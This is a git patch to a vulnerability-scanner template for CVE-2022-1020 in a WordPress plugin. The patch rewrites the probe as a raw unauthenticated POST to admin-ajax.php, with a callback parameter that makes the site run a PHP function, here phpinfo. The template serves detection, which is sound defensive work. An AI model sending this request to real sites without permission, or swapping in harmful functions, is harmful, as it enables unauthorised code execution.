From b685ac8072de0c562330b214a4a8ef3e1c8bbc01 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 22 Apr 2022 17:20:27 +0400 Subject: [PATCH] Update CVE-2022-1020.yaml --- cves/2022/CVE-2022-1020.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1020.yaml b/cves/2022/CVE-2022-1020.yaml index 6ff9d661cc..8244757054 100644 --- a/cves/2022/CVE-2022-1020.yaml +++ b/cves/2022/CVE-2022-1020.yaml @@ -11,9 +11,13 @@ info: tags: wp,wp-plugin,wordpress,cve,cve2022,unauth requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update&callback=phpinfo' + - raw: + - | + POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + option_key=a&perpose=update&callback=phpinfo matchers-condition: and matchers: